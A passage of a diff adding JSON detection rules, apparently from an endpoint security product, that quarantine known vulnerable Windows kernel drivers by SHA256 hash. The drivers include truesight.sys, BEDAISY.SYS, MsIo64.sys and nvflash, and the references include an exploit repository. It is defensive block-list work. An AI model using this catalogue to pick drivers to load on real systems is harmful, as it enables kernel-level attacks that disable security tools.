+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977979Z",
+ "creation_date": "2026-03-23T11:45:29.977981Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977986Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3ba724dd78864cd527a99673fde1bf7f9f85f2415c91708e7380fbe5e2c085dd",
+ "comment": "Vulnerable Kernel Driver (aka LgDCatcher.sys) [https://www.loldrivers.io/drivers/a8e999ee-746f-4788-9102-c1d3d2914f56/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "177548a7-5548-5218-9f2b-d3259104aa58",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148382Z",
+ "creation_date": "2026-03-23T11:45:31.148384Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148389Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7883089fb4a9f67201bde1be555948a6c62aaa841c26f965db030e6588cd0d5c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "177cb25a-7a20-57cc-ab65-bb29a79b744c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616042Z",
+ "creation_date": "2026-03-23T11:45:29.616044Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616050Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890",
+ "comment": "Phoenix Tech. vulnerable BIOS update tool (aka PhlashNT.sys and WinFlash64.sys) [https://www.loldrivers.io/drivers/be3e49ea-095e-4fdb-9529-f4c2dbb9a9fc/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "179a1c0f-1099-5ce6-809a-468f372de81d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825186Z",
+ "creation_date": "2026-03-23T11:45:30.825189Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825197Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4d81fb2f41d806cc7c79ef782de045e78e3b6947dab42dc7888375fd93a781bf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "17a1e819-a606-5845-95ae-a81bc82b2787",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475796Z",
+ "creation_date": "2026-03-23T11:45:31.475800Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475810Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0d7737e5674fbee8e70e0010d45ba9fff511a0af2bfe467a370c79b075fa6240",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "17b8f50a-2df7-5d65-b4e5-73e8028bd93e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835666Z",
+ "creation_date": "2026-03-23T11:45:30.835668Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835673Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "339158f7636138c7e5cbd797ff300e60f765626f374d5175a4c1a5a59549e944",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "17bb0317-9868-5caf-9790-5b011e2aef8b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492037Z",
+ "creation_date": "2026-03-23T11:45:31.492039Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492045Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "db71983915836c7bacf9765601439bdd1150d55a0eb110b3d566fa30b1c3178b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "17bcbb07-5889-586b-b299-430c4b8b397b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829734Z",
+ "creation_date": "2026-03-23T11:45:30.829736Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829742Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ad05b7732ac6c21b0fa72690589d7541ce30a1fb874fbb20c4ccdb7cd580a364",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "17d150c0-ab95-5516-949b-5832e334ed49",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812527Z",
+ "creation_date": "2026-03-23T11:45:31.812529Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812534Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "05c219060623be84d7d1beab607fa2a0a6389b89b8489397921dfb95d659f8cb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "17d4013f-6530-540d-8d28-fed50daadc04",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614144Z",
+ "creation_date": "2026-03-23T11:45:29.614146Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614152Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d636c011b8b2896572f5de260eb997182cc6955449b044a739bd19cbe6fdabd2",
+ "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "17dd6640-ee07-5841-827c-adca96d9f678",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604521Z",
+ "creation_date": "2026-03-23T11:45:29.604523Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604528Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6ae4d36cf42a3bd1ddf9dd98794b401cd995bc519a12ffbde63e63b03a2424b3",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "17f460c2-a541-56e3-99b8-40fe50200abe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456335Z",
+ "creation_date": "2026-03-23T11:45:30.456339Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456347Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a7416a7d9573f1d8873ec1b3109ec683e85412ba817e0001c3ab2d2c92043d4d",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1801d8f9-96e4-5c8d-88b0-b447c4a7aae5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480334Z",
+ "creation_date": "2026-03-23T11:45:31.480338Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480348Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b1e499701948c14970c52586b63c26e2e180a593977ecaa34b28ed749b2a15ae",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "18063a5f-4ac2-54e7-b232-3ce21d0604f9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817979Z",
+ "creation_date": "2026-03-23T11:45:31.817982Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817990Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0596f9e7390c439b1896ca0561d7cf9114f405b237da2b3fb06595a25f3cf0cd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "181b86d8-8476-59e7-b5d0-8c2616798ce7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619001Z",
+ "creation_date": "2026-03-23T11:45:29.619003Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619009Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6a95f3c5cec52da45f9b74660b81226b4314ec18e761490140173998500ae015",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "182515f3-1a2c-505f-8328-e1a87c2d4f2c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478700Z",
+ "creation_date": "2026-03-23T11:45:30.478703Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478712Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d0eb3ba0aff471d19260192784bf9f056d669b779b6eaff84e732b7124ce1d11",
+ "comment": "Vulnerable Kernel Driver (aka Tmel.sys) [https://www.loldrivers.io/drivers/1aeb1205-8b02-42b6-a563-b953ea337c19/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "18295421-b601-52d1-b06a-e7aa6e8e0d1c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604337Z",
+ "creation_date": "2026-03-23T11:45:29.604339Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604345Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7823833a22e11345c69d0c9687b3b75e0043492ed9546d6300a3f63017384538",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "182dcb61-f882-5f5e-bfc8-ade442ab6e2f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488656Z",
+ "creation_date": "2026-03-23T11:45:31.488658Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488663Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5951c107f2e358e96be1341b367d38e2a644453ba349f497efcb543a1d89c8fe",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "182ea10a-b8cf-5a22-8dad-09f0269a484b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491061Z",
+ "creation_date": "2026-03-23T11:45:31.491064Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491073Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7b3b9cbf31ed921cebf444b37d3e5a9c1b4edde8d69e1e33dbe9b4b0281ac406",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1833432c-cb1b-5089-a8ea-a00aef65c44f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488863Z",
+ "creation_date": "2026-03-23T11:45:31.488865Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488880Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cbc56a38483d9fed6030a5f5b4b2a913ed09db6f4166ed18bb3ea2377947d39b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "183b323f-567b-51ba-b497-5d19adda5df4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825041Z",
+ "creation_date": "2026-03-23T11:45:31.825043Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825048Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e76abdf16b55e8e568a2a70f89eaa57edcf57538c082054197f6a48a313386c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "183bd5de-b815-5e2a-b644-b00596788964",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834463Z",
+ "creation_date": "2026-03-23T11:45:30.834466Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834475Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea97ff8adb3ca8abca38cefabc8885f220dc2e937b9af1aa37afdf3b1ca87797",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1853095e-019d-5e98-a5e8-a7b5fe2d0232",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459385Z",
+ "creation_date": "2026-03-23T11:45:30.459389Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459397Z",
